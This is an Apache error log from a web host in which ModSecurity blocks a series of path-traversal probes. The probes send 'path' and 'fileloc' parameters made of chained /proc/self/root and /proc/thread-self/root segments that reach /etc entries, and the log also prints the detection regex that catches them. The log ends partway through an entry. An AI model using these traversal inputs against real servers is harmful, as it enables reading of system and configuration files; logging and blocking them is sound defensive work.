[Fri Mar 20 03:22:03.123700 2026] [:error] [pid 8307:tid 140411607643904] [client 74.7.241.31:54110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzni7-FhjpZGs9ba8qxHwAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:22:12.133788 2026] [proxy_fcgi:error] [pid 17887:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:47964] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:22:13.263838 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.241.31:54286] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznlQkwaGbbGflqUZAQ7gAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:22:27.600624 2026] [:error] [pid 8732:tid 140411557287680] [client 74.7.241.31:43674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzno2WiXEnWizZLXKRTbQAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:22:27.880503 2026] [mime_magic:error] [pid 21219:tid 140411708356352] (70014)End of file found: [client 57.141.18.106:56424] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:22:34.907657 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:54230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznqvXLqtnMIWvjpaJl0QAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:22:37.129779 2026] [proxy_fcgi:error] [pid 7235:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:48940] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:22:41.727870 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:46888] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznsRCii7xarUs8iHYwygAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:22:43.851616 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:46902] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzns_u8EFLIOrSqIpvrmAAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:22:47.067306 2026] [:error] [pid 8307:tid 140411582465792] [client 74.7.241.31:46916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznt7-FhjpZGs9ba8qxNAAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:22:48.537916 2026] [mime_magic:error] [pid 26799:tid 140411683178240] (70014)End of file found: [client 57.141.18.95:57504] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:22:57.438655 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:43562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznwda6ubjKNq_cu4aa-AAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:22:57.458179 2026] [core:alert] [pid 11642:tid 140411548894976] [client 57.141.18.9:57932] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:23:00.826734 2026] [:error] [pid 7235:tid 140411632822016] [client 74.7.243.128:53698] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznxPqxLDW4GITHUkSvAgAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:01.133840 2026] [proxy_fcgi:error] [pid 9818:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49820] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:23:03.796611 2026] [:error] [pid 8307:tid 140411641214720] [client 74.7.243.128:53714] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznx7-FhjpZGs9ba8qxPQAAAww"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:05.755148 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.243.128:53722] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznyfXLqtnMIWvjpaJl3QAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:07.355790 2026] [:error] [pid 21219:tid 140411699963648] [client 74.7.243.128:53728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzny_XLqtnMIWvjpaJl4QAAAoU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:08.745396 2026] [:error] [pid 8307:tid 140411616036608] [client 74.7.243.128:53738] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznzL-FhjpZGs9ba8qxRwAAAw8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:10.226530 2026] [:error] [pid 8732:tid 140411582465792] [client 74.7.243.128:47772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznzmWiXEnWizZLXKRTkAAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:11.646067 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.243.128:47788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abznz11pVZ5mVmJwsFP-WAAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:12.667074 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.243.128:47788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn0F1pVZ5mVmJwsFP-WgAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:14.433393 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:47802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn0ta6ubjKNq_cu4abBwAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:16.907522 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:47804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn1BCii7xarUs8iHYw4QAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:19.064361 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.243.128:47816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn1_qxLDW4GITHUkSvDAAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:22.183128 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.243.128:60602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzn2jJ3M9BSuKP7CAbcDQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:23:25.927308 2026] [:error] [pid 9818:tid 140411649607424] [client 74.7.243.128:60630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] 